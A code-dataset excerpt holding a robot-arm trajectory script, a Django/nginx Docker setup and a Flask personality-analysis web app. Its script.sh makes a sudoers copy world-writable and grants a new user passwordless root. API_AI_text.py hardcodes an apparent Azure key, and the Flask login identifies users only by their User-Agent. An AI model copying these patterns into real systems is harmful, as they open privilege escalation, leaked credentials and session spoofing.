"blob_id": "2ea2d5ca474b778901b197dae4775e904b2c00bb",
"content_id": "6a19a595c6a59b59cfd778a0b4b9e68eae3122f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4953,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 147,
"path": "/files/collect_data.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\n# SAVE_PATH = '/home/msieb/projects/CVAE/data'\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument('-r', '--runname', type=str, required=True)\n# args = parser.parse_args()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e', '--expname', type=str, required=True)\nparser.add_argument('-r', '--runname', type=str, required=True)\nargs = parser.parse_args()\n\nEXP_PATH = '../experiments/{}'.format(args.expname)\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nif not os.path.exists(SAVE_PATH):\n os.makedirs(SAVE_PATH)\n\ndef normalize(a):\n\treturn a/np.linalg.norm(a)\n\ndef save_trajectory(file, savepath, seqname=None):\n\tif seqname is not None:\n\t\tseqname = seqname\n\telse:\n\t # If there's no video directory, this is the first sequence.\n\t if not os.listdir(savepath):\n\t seqname = '0'\n\t else:\n\t # Otherwise, get the latest sequence name and increment it.\n\t seq_names = [int(i.split('.')[0]) for i in os.listdir(savepath)]\n\t latest_seq = sorted(map(int, seq_names), reverse=True)[0]\n\t seqname = str(latest_seq+1)\n\t print('No seqname specified, using: %s' % seqname)\n\twith open(join(savepath, '{0:05d}_{1}.pkl'.format(int(seqname), args.runname)), 'wb') as f:\n\t\tpickle.dump(file, f)\n\n\ndef main():\n\tenv = KukaGymEnv(renders=False,isDiscrete=False, maxSteps = 10000000)\n\t\t\n\ttry: \n\t\tmotorsIds=[]\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"posX\",0.4,0.75,0.537))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"posY\",-.22,.3,0.0))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"posZ\",0.1,1,0.2))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"yaw\",-3.14,3.14,0))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"fingerAngle\",0,0.3,.3))\n\t\t\n\t\tdv = 0.00\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"posX\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"posY\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"posZ\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"yaw\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"fingerAngle\",0,0.3,.3))\n\t\tall_trajectories = []\n\t\tn = 0\n\t\twhile True:\n\t\t\tdone = False\n\t\t\t# Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n\t\t\tstart = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n\t\t\tgoal = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n\t\t\tstate, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n\t\t\taction = normalize(goal - state[:3])*0.001\n\t\t\teps = 0.01\n\t\t\taction = action.tolist()\n\t\t\taction += [0,0]\n\t\t\tif not success:\n\t\t\t\tenv._reset()\n\t\t\t\tcontinue\n\t\t\t# print('diff goal - start: {}'.format(goal - state[:3]))\n\t\t\t# print('start state: {}, goal state: {}'.format(state[:3], goal))\n\t\t\t# print('true state: {}'.format(env._get_link_state()[0]))\n\n\t\t\t# print('normed action: {}'.format((goal - state[:3])/np.linalg.norm(state[:3]- goal)))\n\t\t\t# print('action: {}'.format(action[:3]))\n\t\t\tii = 0\n\n\t\t\ttrajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n\t\t\twhile (not done):\n\t\t\t\taction[:3] = normalize(goal - state[:3])*0.005\n\n\t\t\t\tstate_old = copy(state)\n\t\t\t\tstate_old_aug = cat([state[:3], goal])\n\t\t\t\tstate, reward, done, info = env.step2(action)\n\t\t\t\tstate = np.array(state)\n\t\t\t\t#obs = env.getExtendedObservation()\n\t\t\t\tif ii % 1 == 0:\n\t\t\t\t\t# print('normed executed action: {}'.format((state[:3] - state_old[:3])/np.linalg.norm(state[:3] - state_old[:3])))\n\t\t\t\t\t# print('executed action:{}'.format(state[:3] - state_old[:3]))\n\t\t\t\t\t# print(\"\\n\")\n\t\t\t\t\t# print('current state: {}'.format(state[:3]))\n\t\t\t\t\t# print('goal state: {}'.format(goal))\n\t\t\t\t\t# print('action: {}'.format(action[:3]))\n\t\t\t\t\tpass\n\t\t\t\tii += 1\n\n\t\t\t\ttime.sleep(0.01)\n\t\t\t\t# set_trace()\n\t\t\t\ttrajectory['action'].append(action)\n\t\t\t\ttrajectory['state_aug'].append(state_old_aug)\n\t\t\t\ttrajectory['next_state_aug'].append(cat([state[:3], goal]))\n\t\t\t\tif np.linalg.norm(goal - state[:3]) < eps:\n\t\t\t\t\tdone = True\n\t\t\t\tif ii >= 1000:\n\t\t\t\t\tbreak\n\t\t\tif done:\n\t\t\t\tall_trajectories.append(trajectory)\n\n\t\t\t\tif n % 10 == 0:\n\t\t\t\t\tprint(\"collected {} trajectories\".format(n+1))\n\n\n\t\t\t\tif n % 50 == 0:\n\t\t\t\t\tprint(\"save trajectories\")\n\t\t\t\t\tsave_trajectory(all_trajectories, SAVE_PATH, n+1)\n\t\t\t\tn += 1\n\texcept KeyboardInterrupt:\n\t\tsave_trajectory(all_trajectories, SAVE_PATH)\n\nif __name__==\"__main__\":\n main()\n"
}
] | 7 |
serg1231-git/projects | https://github.com/serg1231-git/projects | cce5e60bd2a17d1ef5d97ff852e1e587a761a1b3 | f940996f653d7a28742f23c16a71f655f77f8dff | e43fe9c6dce7548906778a560ed6fff629bdade8 | refs/heads/main | 2023-04-24T12:03:37.217129 | 2021-05-14T06:59:29 | 2021-05-14T06:59:29 | 359,782,730 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7249190807342529,
"alphanum_fraction": 0.7249190807342529,
"avg_line_length": 33.44444274902344,
"blob_id": "f6e1149972eb7d46617f1e61e93335139ef00861",
"content_id": "3eefa221943a2583299b9a364658197f96b00b7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/Proxy_nginx/Dockerfile",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "FROM nginx:latest\nCOPY ./uwsgi_params /etc/nginx/uwsgi_params\nCOPY ./default.conf /etc/nginx/conf.d/\nRUN mkdir /opt/Proxy\nCOPY ./default.conf /opt/Proxy/\nCOPY ./supersite_oh.ini /opt/Proxy/\nRUN ls -s /opt/Proxy/default.conf /etc/nginx/conf.d/default.conf\nWORKDIR /opt/Proxy/\nCMD [ \"nginx\",\"-g\", \"daemon off;\"]"
},
{
"alpha_fraction": 0.7615384459495544,
"alphanum_fraction": 0.7615384459495544,
"avg_line_length": 25,
"blob_id": "6d2ca067d755b74c8c6e35125cac5c8c24a50f0d",
"content_id": "8d04c6b91c7f305fd3551cd849c55aabd75d439a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 130,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/djangoproject/main/views.py",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\ndef output_main(request):\n return render(request,'django.html')\n# Create your views here.\n"
},
{
"alpha_fraction": 0.4414668679237366,
"alphanum_fraction": 0.4781382083892822,
"avg_line_length": 21.870967864990234,
"blob_id": "ed25238b675fac49d6cef9454b204571fc4f5ae9",
"content_id": "e50ad747bc553fdbb516f765d7c7467c1f8b0aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 31,
"path": "/docker-compose.yml",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "version: '3.8'\nservices:\n \n start-nginx:\n build: \n context: ./Proxy_nginx\n ports: \n - \"7777:7777\"\n container_name: nginx\n depends_on: \n - start-project-django\n volumes: \n - ./Proxy_nginx:/opt/Proxy/\n networks: \n - web_bridge\n \n start-project-django:\n build: \n context: .\n container_name: start-django\n volumes: \n - ./djangoproject:/opt/djangoproject/\n ports: \n - \"8000:8000\"\n command: sh -c \"python manage.py runserver 0.0.0.0:8000\"\n networks: \n - web_bridge\n\nnetworks: \n web_bridge:\n driver: bridge\n"
},
{
"alpha_fraction": 0.7448210716247559,
"alphanum_fraction": 0.7526679039001465,
"avg_line_length": 90.02857208251953,
"blob_id": "cc490b7b7fd143b3d8aa61f46bfebf8ce1fa9f76",
"content_id": "aa0b885aa5601c53df583d179c87ba9678459dc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 5279,
"license_type": "no_license",
"max_line_length": 583,
"num_lines": 35,
"path": "/djangoproject/res/main.html",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "<html>\n <head>\n\t<meta charset=\"utf-8\">\n <title>History Koenigsegg</title>\n <style>\n img{\n text-align: center;\n width: 200px;\n height: 200px;\n }\n </style>\n </head>\n <body>\n <p>\n Свою историю марка сверхмощных и скоростных автомобилей, которые производятся небольшой шведской компанией из местечка Ангельхольм, начала не так уж давно, в 1993 году. Но даже за такой короткий срок, Koenigsegg смогла завоевать бешеную популярность и признание в кругах настоящих автомобильных гурманов, и оказаться в топ рейтинге лучших авто современности.\n </p>\n <p>\n Создателем молодой автомобильной марки и одноименной компании является потомок древнего шведского рода Кристиан фон Кёнигсегг, который вместе с известнейшим дизайнером Дэвидом Крафордом в очень короткие сроки назло всем завистникам смог создать авто необычайной мощности. В общей сложности новый болид собирали 1,5 года поэтапно, чередуя практические испытания и само изготовление машины. Команда под руководством фон Кёнигсегга смогла сделать таки невозможное. Автомобиль оказался значительно лучше по многим параметрам, чем уже существующие лидеры.\n </p>\n <p>\n Для изготовления мощнейшего спортивного автомобиля, способно достойно конкурировать с нынешними лидерами были задействованы самые новые технологии автомобилестроения, включая также комфортабельность болида. После создания опытного образца Кристианом фон Кёнигсегг представители очень многих известных автомобильных компаний только лишь восхищенно лицезрели плоды его работы. Придраться было не к чему. Филигранность и четкость автомобиля вызывала неподдельное восхищение. И уже никто не сомневался, что сегмент высокоскоростных машин вскоре будет занят новым конкурентом.\n </p>\n <img src=\"/static/image/koenigsegg_logo.jpg\">\n <p>\n На сегодняшний день компания Koenigsegg по праву находится в списке самых лучших производителей элитных машин. А выход в свет последней разработки компании – автомобиля Koenigsegg CCXR только лишь подтвердил это. CCXR неофициально нарекли секретным биологическим оружием. Так как для работы двигателя в авто используется биологическое топливо, благодаря чему повышается эффективность работы двигателя, которую невозможно достичь, используя даже самый высококлассный бензин.\n </p>\n <p>\n Компания Koenigsegg при производстве своих авто использует исключительно качественные и дорогостоящие комплектующие, которые выполняются на заказ ведущими предприятиями автомобильной отрасли. Это и оправдывает высокую стоимость автомобилей Koenigsegg. Например, последняя модель Koenigsegg CCXR стоит порядка 1 млн. 200 000 $. Команда компании одновременно может выполнять сборку 7 авто.\n </p>\n <img src=\"/static/image/koenigsegg_ccr.jpg\">\n <p>\n Выпуск в 2004 машины Koenigsegg CCR способствовал тому, что команда Koenigsegg была занесена в книгу рекордов Гиннеса за производство самого мощного авто за всю историю автомобилестроения, подходящего для общественных дорог.\n </p>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7532894611358643,
"avg_line_length": 32.88888931274414,
"blob_id": "9509cfdad09fda6304bf871140ec163a02169869",
"content_id": "8c341621a5fc2a241d446e4549bc06a016735005",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 9,
"path": "/Dockerfile",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "FROM python:3.9.4-buster\nENV PYTHONUNBUFFERED=1\nRUN mkdir /opt/djangoproject/\nCOPY ./djangoproject /opt/djangoproject/\nCOPY ./install.txt /opt/djangoproject/\nWORKDIR /opt/djangoproject/\nRUN pip3 install -r install.txt\nCOPY ./Proxy_nginx/ /opt/Proxy/\nCMD [ \"uwsgi\", \"--ini\", \"/opt/Proxy/supersite_oh.ini\"]"
},
{
"alpha_fraction": 0.7936508059501648,
"alphanum_fraction": 0.841269850730896,
"avg_line_length": 20.11111068725586,
"blob_id": "99a47950471f2b974b7f2b84b37efde090d74205",
"content_id": "2d93929c1ef42bbad58740220b2761d41153c6e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 189,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/Proxy_nginx/supersite_oh.ini",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "[uwsgi]\nchdir=/opt/djangoproject/\nmodule=djangoproject.wsgi:application\nmaster=true\nprocesses=10\nsocket=localhost:8000\nlogfile=/opt/djangoproject/logs/uwsgi.log\nchmod-socket=666\nvacuum=true"
},
{
"alpha_fraction": 0.7053763270378113,
"alphanum_fraction": 0.7075268626213074,
"avg_line_length": 24.77777862548828,
"blob_id": "502680cac897e973adb0454e4cd95c974a77bd3b",
"content_id": "a5ca1a5c8b63a4fab07fa631d0d72f2d753c34c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 18,
"path": "/script.sh",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "random_direct=($(ls -a / | shuf -n 1))\ncd /$random_direct\n#!/bin/bash\necho \"Input customer\"\nread use\ndirect=($(getent passwd $use))\nif [[ $direct ]]; then\necho \"User $use in system\"\nelse\nsudo useradd $use\necho \"User $use will successfully created\"\nfi\nsudo adduser $use sudo\nsudo cp /etc/sudoers /etc/sudoers.new\nsudo chmod ugo+rwx /etc/sudoers.new\necho \"$use ALL=(ALL:ALL) NOPASSWD: ALL\" >> /etc/sudoers.new\nsudo cp /etc/sudoers.new /etc/sudoers\nssh-keygen -t rsa\n\n"
}
] | 7 |
HarangusPaul/Bool-s | https://github.com/HarangusPaul/Bool-s | b66401adcd7e6e9708f4b4a198713c754a2fe395 | 9b7c30fde0e648aca66301441b03c94cc932d02a | 88ec0ff60017bc08b9d49763214308e579f6e715 | refs/heads/master | 2022-12-28T21:23:58.836054 | 2020-10-02T13:45:42 | 2020-10-02T13:45:42 | 273,960,017 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6312981843948364,
"alphanum_fraction": 0.6434499025344849,
"avg_line_length": 36.69832229614258,
"blob_id": "cd61796018f14e30a7d46b479ed5c2be06e3a640",
"content_id": "7258d598e0a6f07ff567c7f3b8747d61686679cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6748,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 179,
"path": "/Interfata/LogInCode.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from flask import Flask,render_template,request\nfrom passlib.hash import pbkdf2_sha256\nfrom Database.DB_CodeUsers import database_GetPassword\nfrom Database.DB_CodeUsers import validate_existence\nfrom Database.DB_CodeUsers import create_NewUser\nfrom Ai.API_AI_text import transmitdata\nfrom Database.DB_CodeUsers import send_Text_Answer,database,send_Facial_Answer\nimport webbrowser\nfrom Interfata.User import User\nfrom werkzeug.utils import secure_filename\nimport sys, os\nfrom Ai.ApiFacial import file_user\n\ndef encrypt_password(password):\n return pbkdf2_sha256.hash(password)\n\n\ndef validate(UserName,Password):\n string = database_GetPassword(UserName)\n if pbkdf2_sha256.verify(Password, string):\n return 1\n return 0\n\nlist_of_errors = [\"Username/Password incorect\",\"No username\",\"No password\",\"Password not match\"]\n\napp = Flask(__name__)\n\nlist_of_logged_users = []\n\ndef add_new_user(username,browser):\n New_User = User(browser,username)\n list_of_logged_users.append(New_User)\n\[email protected](\"/\")\ndef main():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n return render_template(\"MainFacut.html\",n = user.get_user())\n return render_template(\"HomePage.html\")\n\[email protected](\"/reg\")\ndef register():\n return render_template(\"Register.html\")\n\[email protected](\"/reg\",methods=[\"GET\",\"POST\"])\ndef settingData():\n FullName = request.form['fullname']\n Age = int(request.form['age'])\n try:\n Gender = request.form['Option']\n except Exception as ex:\n return render_template(\"Register.html\",n = \"Gender not selected\")\n UserName = request.form['username']\n Email = request.form['email']\n Pass1 = request.form['password']\n Pass2 = request.form['password0']\n if Age < 13 or Age > 110:\n return render_template(\"Register.html\",n = \"Age not corresspond\")\n if Email == \"\" or FullName == \"\" or Age == \"\":\n return render_template(\"Register.html\", n = \"Not completed spaces!\")\n if Pass1 != Pass2:\n return render_template(\"Register.html\",n = list_of_errors[3])\n if len(Pass1) < 6:\n return render_template(\"Register.html\",n = \"A password have atleast 6 characters\")\n freespace = validate_existence(UserName)\n if freespace == 1:\n return render_template(\"Register.html\",n = \"User already exist!\")\n Password = encrypt_password(Pass1)\n create_NewUser(UserName,FullName,Age,Gender,Password,Email,\"\",\"\",\"\",\"\",\"\")\n return render_template(\"MainFacut.html\",n = UserName)\n\[email protected](\"/login\")\ndef login():\n return render_template(\"py.html\")\n\[email protected]('/login',methods=[\"GET\",\"POST\"])\ndef getingData():\n UserName = request.form['username']\n Password = request.form['password']\n step = validate(UserName,Password)\n if Password == \"\":\n return render_template('py.html', n=list_of_errors[2])\n if UserName == \"\":\n return render_template('py.html', n = list_of_errors[1])\n if step == 0:\n return render_template('py.html',n=list_of_errors[0])\n user_data = request.headers.get('User-Agent')\n add_new_user(UserName,user_data)\n return render_template(\"MainFacut.html\",n = UserName)\n\[email protected](\"/terms\")\ndef terms():\n return render_template(\"TermsOfUse.html\")\n\[email protected](\"/personaldata\")\ndef personal_data():\n return render_template(\"PersonalData.html\")\n\[email protected](\"/acc\",methods= [\"GET\",\"POST\"])\ndef get_acc():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n d = database(user.get_user())\n return render_template(\"Account.html\",n = user.get_user() , n3 = user.get_user(),n0 =d['Full_Name'],n1 = d['Age'],n2 = d['Gender'],n4 = d['Gmail'])\n\[email protected](\"/scan\")\ndef facial():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n return render_template(\"FacialScanPage.html\", n=user.get_user())\n\[email protected](\"/scan\",methods= [\"GET\",\"POST\"])\ndef facial_scan():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n username = user.get_user()\n try:\n if request.method == 'POST':\n file = request.files['file']\n filename = secure_filename(file.filename)\n file.save(os.path.join(\"\", filename))\n\n d1 = file_user(str(filename))\n #some work\n send_Facial_Answer(username,d1)\n return render_template(\"ResultPageScan.html\",n = username,n2 = d1)\n except Exception as ex:\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n return render_template(\"FacialScanPage.html\", n=user.get_user())\[email protected](\"/questions\")\ndef question():\n user_data = request.headers.get('User-Agent')\n for user in list_of_logged_users:\n if user.get_browser() == user_data:\n return render_template(\"Questions.html\",n1 = user.get_user())\[email protected](\"/questions\",methods=[\"GET\",\"POST\"])\ndef getquestion():\n Description1 = request.form['d1']\n Description2 = request.form['d2']\n Description3 = request.form['d3']\n\n try:\n Yes_No1 = str(request.form[\"yes/no1\"])\n Yes_No2 = str(request.form[\"yes/no2\"])\n Yes_No3 = str(request.form[\"yes/no3\"])\n Yes_No4 = str(request.form[\"yes/no4\"])\n Yes_No5 = str(request.form[\"yes/no5\"])\n Yes_No6 = str(request.form[\"yes/no6\"])\n except Exception as ex:\n return render_template(\"Questions.html\",n = \"Yes/No:Every entry must be complited\")\n try:\n Introvert = request.form[\"radio\"]\n except Exception as ex:\n return render_template(\"Questions.html\", n=\"Match Words:Every entry must be complited\")\n Favmusic = request.form[\"mw2\"]\n try:\n Color = request.form[\"color\"]\n except Exception as ex:\n return render_template(\"Questions.html\", n=\"Match Words:Every entry must be complited\")\n\n Final_text = Description1 + \".\" + Description2 + \".\" + Description3 + \".\" + Yes_No1 + Yes_No2 + Yes_No3 + Yes_No4 + Yes_No5 + Yes_No6\n Final_text = Final_text + Introvert + \".\" + Favmusic + \".\" + Color\n\n user_data = request.headers.get('User-Agent')\n for user in list_of_logged_users:\n if user.get_browser() == user_data:\n send_Text_Answer(user.get_user(),Final_text)\n return render_template('ResultPageQuestionnaire.html',n1=user.get_user(),n = transmitdata(Final_text))\n\n\ndef start():\n webbrowser.open('http://127.0.0.1:5000/')\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.6715916991233826,
"alphanum_fraction": 0.6957689523696899,
"avg_line_length": 39.24324417114258,
"blob_id": "413e8d8819bf523dcaa16474993de62eee1316e3",
"content_id": "7a3b729d09ee5a1d8ae58f654a51d482b3f58663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1489,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 37,
"path": "/Ai/API_AI_text.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from azure.ai.textanalytics import TextAnalyticsClient\nfrom azure.core.credentials import AzureKeyCredential\n\nKEY = '7e6281e1d9654acbac4a53d1617203f2'\nENDPOINT = 'https://appelletext.cognitiveservices.azure.com/'\n\ndef authenticate_client():\n ta_credential = AzureKeyCredential(KEY)\n text_analytics_client = TextAnalyticsClient(\n endpoint=ENDPOINT, credential=ta_credential)\n return text_analytics_client\n\nclient = authenticate_client()\n\ndef sentiment_analysis_example(client,user_text):\n documents = []\n\n documents.append(user_text)\n response = client.analyze_sentiment(documents=documents)[0]\n text = \"Document Sentiment: {}\".format(response.sentiment)\n text = text + \"\\n\" +\"Overall scores: positive={0:.2f}; neutral={1:.2f}; negative={2:.2f}\".format(\n response.confidence_scores.positive,\n response.confidence_scores.neutral,\n response.confidence_scores.negative,\n )\n for idx, sentence in enumerate(response.sentences):\n text2 = \"\\n\" + \"Sentence: {}\".format(sentence.text)\n text = text + \"\\n\" + \"Sentence {} sentiment: {}\".format(idx + 1, sentence.sentiment)\n text = text +\"\\n\"+\"Sentence score:\\nPositive={0:.2f}\\nNeutral={1:.2f}\\nNegative={2:.2f}\\n\".format(\n sentence.confidence_scores.positive,\n sentence.confidence_scores.neutral,\n sentence.confidence_scores.negative,\n )\n return text\n\ndef transmitdata(text):\n return sentiment_analysis_example(client, text)\n"
},
{
"alpha_fraction": 0.6150442361831665,
"alphanum_fraction": 0.6150442361831665,
"avg_line_length": 21.700000762939453,
"blob_id": "68e21503dd9cee85f63327a34877f6ec00b1ce2c",
"content_id": "2559d088fdf32b4b56304cd7b9276c03d6dd27a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 10,
"path": "/Interfata/User.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "class User:\n def __init__(self,browser,username):\n self.browser = browser\n self.username = username\n\n def get_user(self):\n return self.username\n\n def get_browser(self):\n return self.browser"
},
{
"alpha_fraction": 0.6285880208015442,
"alphanum_fraction": 0.635715663433075,
"avg_line_length": 39.14929962158203,
"blob_id": "f40c8dc1494a5d9c9a97469ebe622d0c877f6cf7",
"content_id": "b92bfd00c1008aa6902afb146b8b4f8c95dc34bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 25945,
"license_type": "no_license",
"max_line_length": 622,
"num_lines": 643,
"path": "/Interfata/templates/PersonalData.html",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <title>Title</title>\n <style>\n body {margin:0;}\n\nbody {\nmargin: 0;\npadding: 0;\nbackground-image: ;\nbackground-size: cover;\nbackground-position: center;\nfont-family: \"Times New Roman\", Times, serif;\n}\n.header {\npadding: 120px;\ntext-align: center;\nbackground-image: url(\"./static/WWHOMEPAGE.jpg\");\nbackground-size: 100% 100%;\ncolor: white;\n}\n\n\n\n/* Increase the font size of the heading */\n.header h1 {\n font-size: 40px;\n}\n\n.navbar {\n overflow: hidden;\n background-color: #001c4d;\n position: -webkit-sticky;\n position: sticky;\n top: 0;\n width: 100%;\n opacity: 0.9;\n}\n\n.footerbar {\n overflow: hidden;\n position: -webkit-sticky;\n top: 0;\n width: 100%;\n\n}\n\n.footerbar a {\n float: left;\n display: block;\n color: #0D3C50;\n text-align: center;\n padding: 14px 16px;\n text-decoration: none;\n font-size: 17px;\n}\n\n/* Right-aligned link */\n.footerbar a.right {\n float: right;\n}\n\n.footerbar a:hover {\n\n color: #FF6701;\n}\n\n.navbar a {\n float: left;\n display: block;\n color: #f2f2f2;\n text-align: center;\n padding: 14px 16px;\n text-decoration: none;\n font-size: 17px;\n}\n\n/* Right-aligned link */\n.navbar a.right {\n float: right;\n font-weight: bold;\n}\n\n\n.navbar a:hover {\n color: #Fcab00;\n}\n\n.main {\n padding: 16px;\n margin: 30px 50px 150px 50px ;\n height: auto; /* Used in this example to enable scrolling */\n}\n\n/* Footer */\n.footer {\n padding: 20px;\n text-align: center;\n background: #ddd;\n}\n\n/* Responsive layout - when the screen is less than 700px wide, make the two columns stack on top of each other instead of next to each other */\n@media screen and (max-width: 700px) {\n .row {\n flex-direction: column;\n }\n}\n\n/* Responsive layout - when the screen is less than 400px wide, make the navigation links stack on top of each other instead of next to each other */\n@media screen and (max-width: 400px) {\n .navbar a {\n float: none;\n width: 100%;\n }\n}\n\n\n* {\n box-sizing: border-box;\n}\n.main t{\n\ttext-decoration: none;\n\tfont-size: 12px;\n\tline-height: 20px;\n\tcolor:black;\n\n}\n.main p{\n\ttext-decoration: none;\n\tfont-size: 12px;\n\tline-height: 20px;\n\tcolor:black;\n\n}\n\n </style>\n</head>\n<body>\n\n\n <div class=\"header\">\n </div>\n\n <div class=\"navbar\">\n <a href=\"http://127.0.0.1:5000\">Home</a>\n<!-- <a href=\"http://127.0.0.1:5000/questions\">Questions Page</a>-->\n<!-- <a href=\"#facialscan\">Facial Scan Page</a>-->\n <a class=\"right\">{{n}}</a>\n\n </div>\n\n <div class=\"main\">\n\n <br>\n <h4>PERSONAL DATA PROTECTION POLICY</h4>\n <t>The ambition of the APPelle webapp is to be a model corporate citizen and to build a better world. Therefore, we attach great importance to the principles of honesty and transparency and are invested in building a strong and lasting relationship with our customers and employees, based on trust and mutual interest. Part of this ambition involves protecting and respecting your privacy as well as your choices. Respecting your privacy is essential for us. This is why we have set out our \"Privacy Promise\" and our entire Privacy Policy below.</t>\n <h5>OUR PROMISE OF CONFIDENTIALITY</h5>\n <t>We respect your privacy and your options. </t><br>\n <t>We make sure that security and confidentiality are built into everything we do.</t><br>\n <t>We will not send you marketing communications unless you have asked us to. You can change your mind at any time.</t>\n <t>We will not provide or sell your data.</t><br>\n <t>We are committed to keeping your data safe and secure. This includes only working with trusted partners.</t><br>\n <t>We are committed to being open and transparent about how we use your data.</t><br>\n <t>We do not use your data in other ways that have not been stipulated.</t><br>\n <t>We respect your rights and always try to satisfy your requests as efficiently as possible, in accordance with our legal and operational responsibilities.</t><br>\n <br><t>For more information about our privacy practices, we set out below the types of personal data we may receive directly from you or your interactions with us, how we may use them, with whom we may share them, and how we protect them. we keep them safe as well as your rights regarding your personal data. Of course, all situations may not apply to you. This privacy policy gives you an overview of all possible situations in which we may interact together.</t><br>\n <t>The more you interact with us, the more you allow us to get to know you and the more we can offer you personalized services.</t><br>\n <t>When you provide us with personal data or when we collect personal data about you, we will use it in accordance with this policy. Please read this information carefully as well as our Q&A page (if any) carefully. If you have any questions or concerns regarding your personal data, please contact us at [email protected].</t><br><br>\n <h5>WHO WE ARE</h5>\n\n <t>APPelle is a personal-social application and is responsible for the personal data you share with us.</t><br>\n <t>For any questions or concerns regarding this policy or your rights, you may contact the person responsible for personal data protection at the email address: [email protected].</t><br><br>\n\n <h5>WHAT ARE PERSONAL DATA?</h5>\n <t>\"Personal data\" means any information or information that can identify you directly (for example, your name) or indirectly (for example, through pseudonymous data, such as a unique identification number). This means that personal data includes things like email / home address / mobile phone, username, profile pictures, personal preferences and shopping habits, user-generated content, financial information and financial statement information. It may also include unique numeric identifiers, such as the IP address of your computer or the MAC address of your mobile device, as well as cookies.</t><br><br>\n\n <h5>WHAT KIND OF DATA DO WE COLLECT FROM 